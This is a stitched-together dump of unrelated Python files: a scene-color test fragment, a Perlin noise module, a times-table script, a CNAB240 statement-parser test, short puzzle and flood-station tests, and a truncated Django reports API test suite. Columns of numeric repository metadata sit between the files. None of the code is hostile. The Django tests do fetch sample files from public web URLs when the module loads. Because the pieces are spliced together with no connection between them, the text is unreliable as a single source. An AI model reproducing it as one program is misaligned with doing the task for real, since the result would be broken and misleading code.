            assert scene['floorMaterial'] != [color_1]
            assert scene['debug']['wallColors'] != [color_1]
            assert scene['wallMaterial'] != [color_1]
        for color_2 in colors:
            if color_1 == color_2:
                continue
            print(f'COLOR_2 {color_2}')
            # Test with one object matching only the floor color: the
            # wall color must be kept.
            scenes = run_update(
                make_body_template(color_1, color_2),
                {'target': [{'debug': {'color': [color_1]}}]}
            )
            for scene in scenes:
                assert scene['debug']['floorColors'] != [color_1]
                assert scene['floorMaterial'] != [color_1]
                assert scene['debug']['wallColors'] == [color_2]
                assert scene['wallMaterial'] == [color_2]
            # Test with multiple objects covering both colors: floor and
            # wall must both avoid both colors.
            scenes = run_update(
                make_body_template(color_1, color_2),
                {
                    'target': [{'debug': {'color': [color_1]}}],
                    'non_target': [{'debug': {'color': [color_2]}}]
                }
            )
            for scene in scenes:
                assert scene['debug']['floorColors'] != [color_1]
                assert scene['debug']['floorColors'] != [color_2]
                assert scene['floorMaterial'] != [color_1]
                assert scene['floorMaterial'] != [color_2]
                assert scene['debug']['wallColors'] != [color_2]
                assert scene['debug']['wallColors'] != [color_1]
                assert scene['wallMaterial'] != [color_2]
                assert scene['wallMaterial'] != [color_1]
| 45.74114
| 79
| 0.621236
| 5,721
| 59,372
| 6.357105
| 0.023772
| 0.124722
| 0.222222
| 0.172895
| 0.965438
| 0.957711
| 0.952157
| 0.947538
| 0.941351
| 0.940829
| 0
| 0.003911
| 0.173179
| 59,372
| 1,297
| 80
| 45.776407
| 0.736953
| 0.001516
| 0
| 0.808696
| 0
| 0
| 0.40557
| 0.000439
| 0
| 0
| 0
| 0
| 0.456522
| 1
| 0.025217
| false
| 0
| 0.002609
| 0.004348
| 0.033043
| 0.01913
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
889552c4e292da89f64010a9aa84d9705edea890
| 3,214
|
py
|
Python
|
processing/fbm/simplex.py
|
sol-ansano-kim/noise
|
5213ac122cf9307d075dcef955547458e35bce81
|
[
"MIT"
] | null | null | null |
processing/fbm/simplex.py
|
sol-ansano-kim/noise
|
5213ac122cf9307d075dcef955547458e35bce81
|
[
"MIT"
] | null | null | null |
processing/fbm/simplex.py
|
sol-ansano-kim/noise
|
5213ac122cf9307d075dcef955547458e35bce81
|
[
"MIT"
] | 1
|
2021-04-29T12:39:01.000Z
|
2021-04-29T12:39:01.000Z
|
# Noise1234 Stefan Gustavson (stegu@itn.liu.se)
# Ken Perlin at Siggraph 2002
# Permutation table from Ken Perlin's reference noise implementation
# (see header attribution above). The 256-value sequence is stored twice
# in a row (512 entries total), matching the original C source layout.
Perm = [151, 160, 137, 91, 90, 15, 131, 13, 201, 95, 96, 53, 194, 233, 7, 225,
        140, 36, 103, 30, 69, 142, 8, 99, 37, 240, 21, 10, 23, 190, 6, 148,
        247, 120, 234, 75, 0, 26, 197, 62, 94, 252, 219, 203, 117, 35, 11, 32,
        57, 177, 33, 88, 237, 149, 56, 87, 174, 20, 125, 136, 171, 168, 68, 175,
        74, 165, 71, 134, 139, 48, 27, 166, 77, 146, 158, 231, 83, 111, 229,
        122, 60, 211, 133, 230, 220, 105, 92, 41, 55, 46, 245, 40, 244, 102,
        143, 54, 65, 25, 63, 161, 1, 216, 80, 73, 209, 76, 132, 187, 208, 89,
        18, 169, 200, 196, 135, 130, 116, 188, 159, 86, 164, 100, 109, 198, 173,
        186, 3, 64, 52, 217, 226, 250, 124, 123, 5, 202, 38, 147, 118, 126, 255,
        82, 85, 212, 207, 206, 59, 227, 47, 16, 58, 17, 182, 189, 28, 42, 223,
        183, 170, 213, 119, 248, 152, 2, 44, 154, 163, 70, 221, 153, 101, 155,
        167, 43, 172, 9, 129, 22, 39, 253, 19, 98, 108, 110, 79, 113, 224, 232,
        178, 185, 112, 104, 218, 246, 97, 228, 251, 34, 242, 193, 238, 210, 144,
        12, 191, 179, 162, 241, 81, 51, 145, 235, 249, 14, 239, 107, 49, 192,
        214, 31, 181, 199, 106, 157, 184, 84, 204, 176, 115, 121, 50, 45, 127,
        4, 150, 254, 138, 236, 205, 93, 222, 114, 67, 29, 24, 72, 243, 141, 128,
        195, 78, 66, 215, 61, 156, 180, 151, 160, 137, 91, 90, 15, 131, 13, 201,
        95, 96, 53, 194, 233, 7, 225, 140, 36, 103, 30, 69, 142, 8, 99, 37, 240,
        21, 10, 23, 190, 6, 148, 247, 120, 234, 75, 0, 26, 197, 62, 94, 252,
        219, 203, 117, 35, 11, 32, 57, 177, 33, 88, 237, 149, 56, 87, 174, 20,
        125, 136, 171, 168, 68, 175, 74, 165, 71, 134, 139, 48, 27, 166, 77,
        146, 158, 231, 83, 111, 229, 122, 60, 211, 133, 230, 220, 105, 92, 41,
        55, 46, 245, 40, 244, 102, 143, 54, 65, 25, 63, 161, 1, 216, 80, 73,
        209, 76, 132, 187, 208, 89, 18, 169, 200, 196, 135, 130, 116, 188, 159,
        86, 164, 100, 109, 198, 173, 186, 3, 64, 52, 217, 226, 250, 124, 123, 5,
        202, 38, 147, 118, 126, 255, 82, 85, 212, 207, 206, 59, 227, 47, 16, 58,
        17, 182, 189, 28, 42, 223, 183, 170, 213, 119, 248, 152, 2, 44, 154,
        163, 70, 221, 153, 101, 155, 167, 43, 172, 9, 129, 22, 39, 253, 19, 98,
        108, 110, 79, 113, 224, 232, 178, 185, 112, 104, 218, 246, 97, 228, 251,
        34, 242, 193, 238, 210, 144, 12, 191, 179, 162, 241, 81, 51, 145, 235,
        249, 14, 239, 107, 49, 192, 214, 31, 181, 199, 106, 157, 184, 84, 204,
        176, 115, 121, 50, 45, 127, 4, 150, 254, 138, 236, 205, 93, 222, 114,
        67, 29, 24, 72, 243, 141, 128, 195, 78, 66, 215, 61, 156, 180]
def fade(t):
    """Perlin's quintic smoothstep 6t^5 - 15t^4 + 10t^3, in Horner form.

    Gives zero first and second derivatives at t=0 and t=1, so
    interpolated noise has continuous curvature across cell boundaries.
    """
    inner = t * (t * 6 - 15) + 10
    return t * t * t * inner
def floor(x):
    """Return the largest integer <= x (mathematical floor).

    The previous fast-floor idiom ``int(x) if x > 0 else int(x) - 1``
    was wrong for x == 0 (returned -1) and for exact negative integers
    (floor(-2.0) returned -3). int() truncates toward zero, so we only
    subtract 1 when truncation rounded *up* (i.e. x was negative and
    non-integral).
    """
    i = int(x)  # truncates toward zero
    return i if i <= x else i - 1
def lerp(v1, v2, w):
    """Linearly interpolate between v1 and v2 by weight w (w=0 -> v1, w=1 -> v2)."""
    delta = float(v2 - v1)
    return v1 + w * delta
def gradient(hash, x):
    """1-D Perlin gradient: low 3 bits of the hash pick a magnitude in 1..8,
    bit 3 flips the sign, and the result scales the distance x."""
    h = hash & 15
    magnitude = 1 + (h & 7)  # 1..8
    if h & 8:                # high nibble bit selects negative direction
        magnitude = -magnitude
    return magnitude * x
def noise(x):
    """1-D Perlin noise at coordinate x, scaled by the conventional 0.188
    factor to keep output roughly within [-1, 1].

    Looks up permutation-table gradients at the two lattice points
    surrounding x and blends them with the quintic fade curve.
    """
    cell = floor(x)
    frac0 = x - cell          # distance from the left lattice point
    frac1 = frac0 - 1.0       # distance from the right lattice point
    idx1 = (cell + 1) & 0xff  # wrap indices into the 256-entry table
    idx0 = cell & 0xff
    weight = fade(frac0)
    g0 = gradient(Perm[idx0], frac0)
    g1 = gradient(Perm[idx1], frac1)
    return 0.188 * lerp(g0, g1, weight)
| 45.914286
| 80
| 0.506845
| 616
| 3,214
| 2.644481
| 0.477273
| 0.004911
| 0.005525
| 0.013505
| 0.807858
| 0.807858
| 0.807858
| 0.807858
| 0.807858
| 0.807858
| 0
| 0.60856
| 0.302116
| 3,214
| 69
| 81
| 46.57971
| 0.1177
| 0.022713
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.002549
| 0
| 0
| 1
| 0.09434
| false
| 0
| 0
| 0.056604
| 0.188679
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ee0349f14e250a2c831e6cba59f686a29bc45991
| 1,456
|
py
|
Python
|
Curso_Gustavo_Guanabara/Exercico(Tabuada).py
|
Nathan120/Arq_Python_CursoEmVideo
|
d6269eeaa8db57d1ffa8ed66e1936a061803f37e
|
[
"MIT"
] | null | null | null |
Curso_Gustavo_Guanabara/Exercico(Tabuada).py
|
Nathan120/Arq_Python_CursoEmVideo
|
d6269eeaa8db57d1ffa8ed66e1936a061803f37e
|
[
"MIT"
] | null | null | null |
Curso_Gustavo_Guanabara/Exercico(Tabuada).py
|
Nathan120/Arq_Python_CursoEmVideo
|
d6269eeaa8db57d1ffa8ed66e1936a061803f37e
|
[
"MIT"
] | null | null | null |
# Multiplication-table ("tabuada") console exercise: repeatedly ask the user
# for a number and print its times table from 0 to 10, until they answer 'n'.
print('----------TABUADA------')
while True:
    escolha = int(input('Ecolha o número para mostra na Tabela(0-9) = '))
    # The original repeated an identical loop in eleven separate `if` blocks,
    # one per value 0..10. A single range check is behaviorally equivalent:
    # values outside 0..10 simply print nothing, exactly as before.
    if 0 <= escolha <= 10:
        for i in range(11):
            print('{} x {} = {}'.format(escolha, i, escolha * i))
    saida = input('Deseja Fazer mais uma operação?[s/n]')
    if saida == 'n':
        break
| 36.4
| 73
| 0.468407
| 194
| 1,456
| 3.515464
| 0.216495
| 0.258065
| 0.096774
| 0.177419
| 0.793255
| 0.793255
| 0.793255
| 0.793255
| 0.793255
| 0.793255
| 0
| 0.036697
| 0.326236
| 1,456
| 39
| 74
| 37.333333
| 0.658512
| 0
| 0
| 0.564103
| 0
| 0
| 0.162775
| 0.015797
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.307692
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ee416b467ffc201530f2413c5300d28e15c9c30b
| 5,129
|
py
|
Python
|
tests/statement/test_statement.py
|
netosjb/febraban-python
|
a546fa3353d2db1546df60f6f8cc26c7c862c743
|
[
"MIT"
] | 3
|
2021-05-04T16:07:24.000Z
|
2022-03-06T22:08:37.000Z
|
tests/statement/test_statement.py
|
netosjb/febraban-python
|
a546fa3353d2db1546df60f6f8cc26c7c862c743
|
[
"MIT"
] | 2
|
2021-03-01T00:06:57.000Z
|
2021-03-01T00:14:55.000Z
|
tests/statement/test_statement.py
|
netosjb/febraban-python
|
a546fa3353d2db1546df60f6f8cc26c7c862c743
|
[
"MIT"
] | 1
|
2021-08-18T03:05:43.000Z
|
2021-08-18T03:05:43.000Z
|
from unittest.case import TestCase
from febraban.cnab240.statement import StatementParser
# Fixed-width CNAB240 return-file fixture: a file header, batch header,
# thirteen segment-"E" statement lines (debits 'D' / credits 'C' with amounts
# in cents), a batch trailer carrying the expected totals, and a file trailer.
# Column positions follow the FEBRABAN CNAB240 layout, so whitespace is
# significant — do not reformat these lines.
returnFile = \
"""
07700000 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA BANCO INTER S.A. 21211202016361800001610100000 000
07700011E0440033 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 17082020000000000000732846CFBRL00016
0770001300001E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S1908202019082020000000000000082240D1127059PAGAMENTO DE TITULO 026135
0770001300002E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2008202020082020000000000000264357D1127045PAGAMENTO DE CONVENIO 000000
0770001300003E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2008202020082020000000000000433675D1127045PAGAMENTO DE CONVENIO 000000
0770001300004E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2008202020082020000000000000084054D1127045PAGAMENTO DE CONVENIO 000000
0770001300005E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2008202020082020000000000000200000C2067211RESGATE 672827
0770001300006E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2108202021082020000000000000144000C2017193DEPOSITO BOLETO 24 HORAS 000000
0770001300007E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2108202021082020000000000000600000C2017193DEPOSITO BOLETO 24 HORAS 000000
0770001300008E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2108202021082020000000000000100000C2017193DEPOSITO BOLETO 24 HORAS 000000
0770001300009E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2108202021082020000000000000131800C2017193DEPOSITO BOLETO 24 HORAS 000000
0770001300010E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2108202021082020000000000000098000C2017193DEPOSITO BOLETO 24 HORAS 000000
0770001300011E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2108202021082020000000000000080000C2017193DEPOSITO BOLETO 24 HORAS 000000
0770001300012E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2408202024082020000000000000300000D1207065TED ENVIADA 025012
0770001300013E 223130935000198 0000190000014054310 KMEE INFORMATICA LTDA 00 S2508202025082020000000000000076900C2097067TED RECEBIDA 671091
07700015 223130935000198 0000190000014054310 00000000000000000000000000000000000000000000000000000025082020000000000000999220CF000015000000000001164326000000000001430700
07799999 000001000017000001
""".strip()
class ParserTest(TestCase):
    """End-to-end check of StatementParser against the returnFile fixture."""

    def testReturnStatementFile(self):
        """Parsed per-line debit/credit amounts must sum to the trailer totals."""
        statement = StatementParser.parseText(returnFile)
        totals = {'D': 0, 'C': 0}
        for entry in statement.lines:
            if entry.debit_credit in totals:
                totals[entry.debit_credit] += entry.amountInCents
        self.assertEqual(statement.debit_sum_in_cents, totals['D'])
        self.assertEqual(statement.credit_sum_in_cents, totals['C'])
| 122.119048
| 646
| 0.501267
| 234
| 5,129
| 10.952991
| 0.384615
| 0.212251
| 0.222396
| 0.286773
| 0.320328
| 0.27897
| 0
| 0
| 0
| 0
| 0
| 0.61202
| 0.487424
| 5,129
| 41
| 647
| 125.097561
| 0.362876
| 0
| 0
| 0
| 0
| 0
| 0.003231
| 0
| 0
| 0
| 0
| 0
| 0.125
| 1
| 0.0625
| false
| 0
| 0.125
| 0
| 0.25
| 0
| 0
| 0
| 1
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ee74dde96e9e05652b6a3ba3f63b7172aab82fb5
| 263
|
py
|
Python
|
day8/test_day8.py
|
hmcc/advent-of-code-2020
|
827c952c30aca2e72fb37818050fba1076095161
|
[
"MIT"
] | null | null | null |
day8/test_day8.py
|
hmcc/advent-of-code-2020
|
827c952c30aca2e72fb37818050fba1076095161
|
[
"MIT"
] | null | null | null |
day8/test_day8.py
|
hmcc/advent-of-code-2020
|
827c952c30aca2e72fb37818050fba1076095161
|
[
"MIT"
] | null | null | null |
from day8 import day8
def test_parse_line_nop():
    """A 'nop' instruction with '+0' parses to opcode 'nop' and argument 0."""
    parsed = day8.parse_line('nop +0')
    assert parsed == ['nop', 0]
def test_parse_line_acc():
    """An 'acc' instruction with '+1' parses to opcode 'acc' and argument 1."""
    parsed = day8.parse_line('acc +1')
    assert parsed == ['acc', 1]
def test_parse_line_jmp():
    """A 'jmp' instruction with a negative offset keeps its sign after parsing."""
    parsed = day8.parse_line('jmp -3')
    assert parsed == ['jmp', -3]
| 18.785714
| 51
| 0.638783
| 43
| 263
| 3.627907
| 0.325581
| 0.346154
| 0.230769
| 0.307692
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.050691
| 0.174905
| 263
| 13
| 52
| 20.230769
| 0.668203
| 0
| 0
| 0
| 0
| 0
| 0.102662
| 0
| 0
| 0
| 0
| 0
| 0.428571
| 1
| 0.428571
| true
| 0
| 0.142857
| 0
| 0.571429
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 0
| 0
| 1
| 0
|
0
| 7
|
ee7ba0619ad0f7e20788ca57030405a8d82cd98a
| 268
|
py
|
Python
|
test_inconsistent_typical_range_stations.py
|
cued-ia-computing/flood-jdv24-ahw41
|
b8d62b33281dfb01aec569998b88769ca6d06556
|
[
"MIT"
] | null | null | null |
test_inconsistent_typical_range_stations.py
|
cued-ia-computing/flood-jdv24-ahw41
|
b8d62b33281dfb01aec569998b88769ca6d06556
|
[
"MIT"
] | null | null | null |
test_inconsistent_typical_range_stations.py
|
cued-ia-computing/flood-jdv24-ahw41
|
b8d62b33281dfb01aec569998b88769ca6d06556
|
[
"MIT"
] | null | null | null |
from floodsystem.station import inconsistent_typical_range_stations
from testingData import getFakeData
def test_inconsistent_typical_range_stations():
    """Only the known bad fixture station should be reported as inconsistent."""
    fake_stations = getFakeData()
    flagged = inconsistent_typical_range_stations(fake_stations)
    assert flagged == ['Garret Hostel Bridge']
| 33.5
| 84
| 0.835821
| 29
| 268
| 7.37931
| 0.551724
| 0.266355
| 0.336449
| 0.448598
| 0.373832
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.108209
| 268
| 7
| 85
| 38.285714
| 0.895397
| 0
| 0
| 0
| 0
| 0
| 0.074627
| 0
| 0
| 0
| 0
| 0
| 0.2
| 1
| 0.2
| false
| 0
| 0.4
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
ee913e64372dd2a769a46890fceb4004e49eb511
| 222,279
|
py
|
Python
|
reports/tests/test_api.py
|
CMU-TRP/podd-api
|
6eb5c4598f848f75d131287163cd9babf2a0a0fc
|
[
"MIT"
] | 3
|
2020-04-26T06:28:50.000Z
|
2021-04-05T08:02:26.000Z
|
reports/tests/test_api.py
|
CMU-TRP/podd-api
|
6eb5c4598f848f75d131287163cd9babf2a0a0fc
|
[
"MIT"
] | 10
|
2020-06-05T17:36:10.000Z
|
2022-03-11T23:16:42.000Z
|
reports/tests/test_api.py
|
CMU-TRP/podd-api
|
6eb5c4598f848f75d131287163cd9babf2a0a0fc
|
[
"MIT"
] | 5
|
2021-04-08T08:43:49.000Z
|
2021-11-27T06:36:46.000Z
|
# -*- encoding: utf-8 -*-
import datetime
import json
import urllib2
from django.conf import settings
from django.core.files import File
from django.core.files.uploadedfile import InMemoryUploadedFile
from django.core.management import call_command
from django.core.urlresolvers import reverse
from django.test.client import encode_multipart
from django.utils import timezone
from mock import patch
from mock import mock_open
from mockredis import mock_strict_redis_client
from rest_framework.test import APITestCase
from common import factory
from common.constants import (PRIORITY_FOLLOW, GROUP_WORKING_TYPE_REPORT_TYPE,
GROUP_WORKING_TYPE_ADMINSTRATION_AREA, GROUP_WORKING_TYPE_ALERT_REPORT_ADMINSTRATION_AREA,
GROUP_WORKING_TYPE_ALERT_REPORT_REPORT_TYPE, USER_STATUS_ADDITION_VOLUNTEER, SUPPORT_LIKE_ME_TOO_COMMENT,
SUPPORT_COMMENT, SUPPORT_LIKE_ME_TOO, SUPPORT_LIKE, SUPPORT_ME_TOO)
from flags.models import Flag
from mentions.models import Mention
from notifications.models import Notification
from reports.models import Report, ReportImage, ReportComment, ReportType, ReportAbuse
from reports.tests.test_models import common_public_setup
from summary.tests.test_api import order_list_by_id
def mock_upload_to_s3(file):
    """Test double for the real S3 uploader: echoes back the file's name."""
    uploaded_key = file.name
    return uploaded_key
def get_temporary_file():
    # Downloads a sample JPEG into /tmp/hello.world.jpg and returns the file
    # object. NOTE(review): requires network access and Python 2 (urllib2).
    m = mock_open()
    # NOTE(review): patching '__main__.open' does not affect the direct open()
    # call below — presumably left over from an earlier mocking approach;
    # verify whether this patch is still needed.
    with patch('__main__.open', m, create=True):
        temporary_file = open('/tmp/hello.world.jpg', 'w')
        file = File(temporary_file)
        file.write(urllib2.urlopen('http://www.yespetshop.com/private_folder/kitten-1.jpg').read())
        # NOTE(review): '.closed' is an attribute read, not a call — these two
        # lines are no-ops and the files are never actually closed here;
        # likely '.close()' was intended. Confirm before changing, since
        # callers may rely on the handle still being open.
        file.closed
        temporary_file.closed
    return temporary_file
# NOTE(review): module-level call — performs a network download as a side
# effect every time this test module is imported; looks unintentional, verify.
get_temporary_file()
def get_large_temporary_file():
    # Downloads a large PDF into /tmp/hello_large.world and returns the file
    # object. NOTE(review): requires network access and Python 2 (urllib2).
    m = mock_open()
    # NOTE(review): patching '__main__.open' does not affect the direct open()
    # call below — same questionable pattern as get_temporary_file; verify.
    with patch('__main__.open', m, create=True):
        temporary_file = open('/tmp/hello_large.world', 'w')
        file = File(temporary_file)
        file.write(urllib2.urlopen('http://www.nasa.gov/pdf/703154main_earth_art-ebook.pdf').read())
        # NOTE(review): '.closed' is an attribute read, not a call — no-ops;
        # likely '.close()' was intended.
        file.closed
        temporary_file.closed
    return temporary_file
@patch('django_redis.get_redis_connection', mock_strict_redis_client)
class TestApiReportList(APITestCase):
def setUp(self):
try:
self.default_positive_type = ReportType.objects.get(id=0)
except ReportType.DoesNotExist:
self.default_positive_type = ReportType.objects.create(
id=0,
name='Positive Report Type',
form_definition='{}',
version=0,
)
call_command('clear_index', interactive=False, verbosity=0)
self.taeyeon = factory.create_user()
self.jessica = factory.create_user()
self.yoona = factory.create_user()
self.authority = factory.create_authority()
self.authority.users.add(self.yoona)
self.authority_1 = factory.create_authority()
self.authority.users.add(self.taeyeon)
self.authority_2 = factory.create_authority()
self.authority.users.add(self.jessica)
self.type1 = factory.create_report_type(authority=self.authority)
self.type2 = factory.create_report_type(authority=self.authority)
self.type3 = factory.create_report_type(authority=self.authority_2)
self.area1 = factory.create_administration_area(authority=self.authority_1)
self.area2 = factory.create_administration_area(authority=self.authority_1)
self.area3 = factory.create_administration_area(authority=self.authority_2)
self.authority_1.inherits.add(self.authority)
self.report1 = factory.create_report(created_by=self.taeyeon, type=self.type2,
administration_area=self.area2, form_data={
"symptom": u"cough,ปวดหัว,stiff",
"sickCount": 5,
}, date=datetime.datetime(2014, 11, 7, 12, 30, 45))
self.report2 = factory.create_report(created_by=self.taeyeon, type=self.type1,
administration_area=self.area1, date=datetime.datetime(2014, 11, 11, 12, 30, 45))
self.report3 = factory.create_report(created_by=self.jessica, type=self.type1,
administration_area=self.area2, date=datetime.datetime(2014, 11, 9, 13, 30, 45))
self.report4 = factory.create_report(type=self.type3, administration_area=self.area2)
self.report5 = factory.create_report(type=self.type1, administration_area=self.area3)
self.flag = factory.create_flag(report=self.report1, priority=1, flag_owner=self.taeyeon)
def test_api_report(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
self.assertEqual(report1['reportId'], self.report2.report_id)
self.assertEqual(report1['guid'], self.report2.guid)
self.assertEqual(report1['reportTypeId'], self.report2.type.id)
self.assertEqual(report1['administrationAreaId'], self.report2.administration_area.id)
self.assertEqual(report1['negative'], self.report2.negative)
self.assertEqual(report1['createdByName'], self.report2.created_by.get_full_name())
self.assertEqual(report1['date'], self.report2.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report1['incidentDate'], self.report2.incident_date.strftime('%Y-%m-%d'))
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
self.assertEqual(report2['reportId'], self.report3.report_id)
self.assertEqual(report2['guid'], self.report3.guid)
self.assertEqual(report2['reportTypeId'], self.report3.type.id)
self.assertEqual(report2['administrationAreaId'], self.report3.administration_area.id)
self.assertEqual(report2['negative'], self.report3.negative)
self.assertEqual(report2['createdByName'], self.report3.created_by.get_full_name())
self.assertEqual(report2['date'], self.report3.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report2['incidentDate'], self.report3.incident_date.strftime('%Y-%m-%d'))
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
self.assertEqual(report3['reportId'], self.report1.report_id)
self.assertEqual(report3['guid'], self.report1.guid)
self.assertEqual(report3['reportTypeId'], self.report1.type.id)
self.assertEqual(report3['administrationAreaId'], self.report1.administration_area.id)
self.assertEqual(report3['negative'], self.report1.negative)
self.assertEqual(report3['createdByName'], self.report1.created_by.get_full_name())
self.assertEqual(report3['date'], self.report1.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report3['incidentDate'], self.report1.incident_date.strftime('%Y-%m-%d'))
def test_api_report_with_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
report1 = response_json['results'][0]
self.assertEqual(report1['id'], self.report2.id)
self.assertEqual(report1['reportId'], self.report2.report_id)
self.assertEqual(report1['guid'], self.report2.guid)
self.assertEqual(report1['reportTypeId'], self.report2.type.id)
self.assertEqual(report1['administrationAreaId'], self.report2.administration_area.id)
self.assertEqual(report1['negative'], self.report2.negative)
self.assertEqual(report1['createdByName'], self.report2.created_by.get_full_name())
self.assertEqual(report1['date'], self.report2.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report1['incidentDate'], self.report2.incident_date.strftime('%Y-%m-%d'))
# self.assertEqual(report1['flag'], '')
report2 = response_json['results'][1]
self.assertEqual(report2['id'], self.report3.id)
self.assertEqual(report2['reportId'], self.report3.report_id)
self.assertEqual(report2['guid'], self.report3.guid)
self.assertEqual(report2['reportTypeId'], self.report3.type.id)
self.assertEqual(report2['administrationAreaId'], self.report3.administration_area.id)
self.assertEqual(report2['negative'], self.report3.negative)
self.assertEqual(report2['createdByName'], self.report3.created_by.get_full_name())
self.assertEqual(report2['date'], self.report3.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report2['incidentDate'], self.report3.incident_date.strftime('%Y-%m-%d'))
# self.assertEqual(report2['flag'], '')
report3 = response_json['results'][2]
self.assertEqual(report3['id'], self.report1.id)
self.assertEqual(report3['reportId'], self.report1.report_id)
self.assertEqual(report3['guid'], self.report1.guid)
self.assertEqual(report3['reportTypeId'], self.report1.type.id)
self.assertEqual(report3['administrationAreaId'], self.report1.administration_area.id)
self.assertEqual(report3['negative'], self.report1.negative)
self.assertEqual(report3['createdByName'], self.report1.created_by.get_full_name())
self.assertEqual(report3['date'], self.report1.date.strftime('%Y-%m-%dT%H:%M:%SZ'))
self.assertEqual(report3['incidentDate'], self.report1.incident_date.strftime('%Y-%m-%d'))
# self.assertEqual(report3['flag'], '1')
def test_api_report_with_pagination(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
params = {
'page_size': 2
}
response = self.client.get(reverse('report-list'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
self.assertEqual(len(response_json['results']), 2)
params = {
'page_size': 2,
'page': 2
}
response = self.client.get(reverse('report-list'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
self.assertEqual(len(response_json['results']), 1)
def test_api_report_with_pagination_wih_authority(self):
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.yoona.auth_token.key)
params = {
'page_size': 2
}
response = self.client.get(reverse('report-list'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
self.assertEqual(len(response_json['results']), 2)
params = {
'page_size': 2,
'page': 2
}
response = self.client.get(reverse('report-list'), params)
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
self.assertEqual(len(response_json['results']), 1)
def test_api_return_report_only_administration_area_in_group_role_reporter(self):
group_a = factory.add_user_to_new_group(user=self.taeyeon,
type=GROUP_WORKING_TYPE_ALERT_REPORT_ADMINSTRATION_AREA)
area = factory.create_administration_area()
factory.create_group_administration_area(group=group_a, administration_area=area)
report = factory.create_report(created_by=self.taeyeon, type=self.type1,
administration_area=area)
self.client.credentials(HTTP_AUTHORIZATION = 'Token ' + self.taeyeon.auth_token.key)
response = self.client.get(reverse('report-list'))
self.assertEqual(response.status_code, 200)
response_json = json.loads(response.content)
self.assertEqual(response_json['count'], 3)
def test_api_return_report_only_report_type_in_group_role_reporter(self):
group_r = factory.add_user_to_new_group(user=self.taeyeon,
type=GROUP_WORKING_TYPE_ALERT_REPORT_REPORT_TYPE)
newtype = factory.create_report_type()
